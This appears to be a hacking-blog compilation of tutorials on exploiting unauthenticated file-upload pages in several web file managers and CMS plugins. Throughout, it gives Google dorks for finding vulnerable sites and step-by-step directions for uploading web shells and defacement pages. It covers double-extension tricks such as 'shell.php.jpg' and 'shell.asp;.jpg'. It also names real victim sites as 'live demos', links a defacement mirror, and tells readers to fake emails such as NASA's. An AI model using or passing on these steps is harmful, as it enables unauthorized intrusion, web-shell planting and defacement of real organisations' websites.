EzFilemanager Deface Upload vulnerability

EzFilemanager Deface Upload vulnerability

 


Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)

Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and
put ?sa=1&type=file after URL
now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files

Asset Manager :Shell and Files upload Vulnerability

Asset Manager :Shell and Files upload Vulnerability

Google Dork : “inurl:Editor/assetmanager/assetmanager.asp”
images (235×215)

Open Google.com/ncr and enetr this dork

“inurl:Editor/assetmanager/assetmanager.asp”

Now Open any site from search results

Now You will Got a Page Like That

New Folder  Del Folder

Upload File: 

and site url will be like site.com/Editor/assetmanager/assetmanager.asp

Change The Flash into all Files and Now choose Your File and Upload

and acess Your file here site.com/Editor/assets/yourfilehere

Special : How To upload a cool deface 😉
Go; to http://www.flashvortex.com/ and choose a cool design .. Now put your text and download it ..
rename the file After Downloading and upload it 🙂

Ajax File Manager ~ Shell and Files Upload Vulnerability

372186_100002061928187_1094618549_n.jpg (180×178)

Open Google Search Engine, Type this dork : inurl:/plugins/ajaxfilemanager/
For Example I got :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/

for example :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

Now Find Upload Upload and Upload Your shell/Deface/file

To view you File find /Uploaded/ directory in Website by using your brain 😛

example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt

“Simple Upload 53” : Shell Upload Vulnerability

Title : “Simple Upload 53” : Shell Upload Vulnerability
jpeg (207×125)Google Dork : “inurl:simple-upload-53.php”          


Go to Google.com and enter dork ~
“inurl:simple-upload-53.php” 


see search results and select any website

the exploit url will be link this


http://www.site.com/simple-upload-53.php

Now Upolad Your shell here as .php.jpg .php.girf etc
and you can upload your deface in image Type

to view you uploaded file just goto http://www.site.com/files/yourfilehere

Demo site : http://www.stpatricksdayshirts.com/simple-upload-53.php
Uploaded file : http://www.stpatricksdayshirts.com/files/devilscafe.jpg

Funnt Thing : http://www.stpatricksdayshirts.com/simple-upload-53.php?message= Put Your Massege here it will show on website 😀

“QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily

“QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability”

computer-virus-iran-power-nuclear.jpg (400×300)

open Google.com and type this dork 
intitle:”QuiXplorer 2.3 – the QuiX project”

you’ll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity

http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
 after Going to this you will saw a file manager 
you can upload your files here
find this edit file create file etc icons in page and click on last, its upload option

You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
after index.php?
example :

http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes

Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view 
Live demo : 
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/  
i know some asshole will chnage the deface 
so its mirrOr of defacements http://attack-h.org/attack/?id=8452

 

“Portail Dokeos” deface and Shell Upload vulnerability

Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability
in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password

code-hack.jpg (240×240)

Google Dork : “Portail Dokeos 1.8.5”
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Goto : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html chnage asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here
To view your uploaded file go here : http://website/patch/main/upload/your file here

“Encodable” ~ another Deface and shell upload Vulnerablity

Title : “Encodable” ~ another File upload Vulnerablity

safe_image.php (90×90)Google Dork : “intext:File Upload by Encodable”
Lets Start .. xd
open google.com and enter this dork :  “intext:File Upload by Encodable”
result comes with 166,000 results but some results are fake … its may be malwaers
so pick real things only , “Upload a file”  You will this title in search results here 🙂
click the sites sites only which comes with upload a file title
after click the link you’ll got a upload form
you’ll saw some options in this form like name Description email etc …
 type anything in these boxes but add a email in email box, dont use your own
put this one billy@microsoft.com , admin@nasa.gov etc 😛
now choose you file and upload it 🙂
after clicking on upload button a pop up will be open … dont close it, it will automatilcly closed
after uploading file
in some sites you’ll got you uploaded file link after uploading on website
and if you did not file it then try these url
/upload/files/
or /upload/userfiles/

“Add Testimonial” ~ remote File upload vulnerability

“Add Testimonial” ~  remote File upload vulnerability.
Google Dork : 2011 all rights reserved.Website Designed by GanjaDaddy.com


[#1]
Open website ..

[#2] Go to this URL : testimonial/add.html.php For example :  http://Site.com/testimonial/add.html.php

[#3]
Now Upload Your Deface or any file

[#4] to view you upload file go to /images/testimonial/ , you’ll se index of files here … click on last file, its urs !!

[#5] enjOy =) Leave a Comment beLow if you Like it

” Image Uploader” Shell Upload Vulnrability

“CMS admin Image Uploader” Shell Upload Vulnrability




Google dorks
inurl:”default_image.asp”
inurl:”default_imagen.asp”

inurl:”/box_image.htm”

You’ll got a upload option after clicking on link that you got in google serach results

Now select your deface, or shell and upload it =)
supported foramts : shell.asp;.jpg, shell.php;.jpg, .gif, .jpg, .png, .pdf, .zip .html .php
you can use Tamper data too…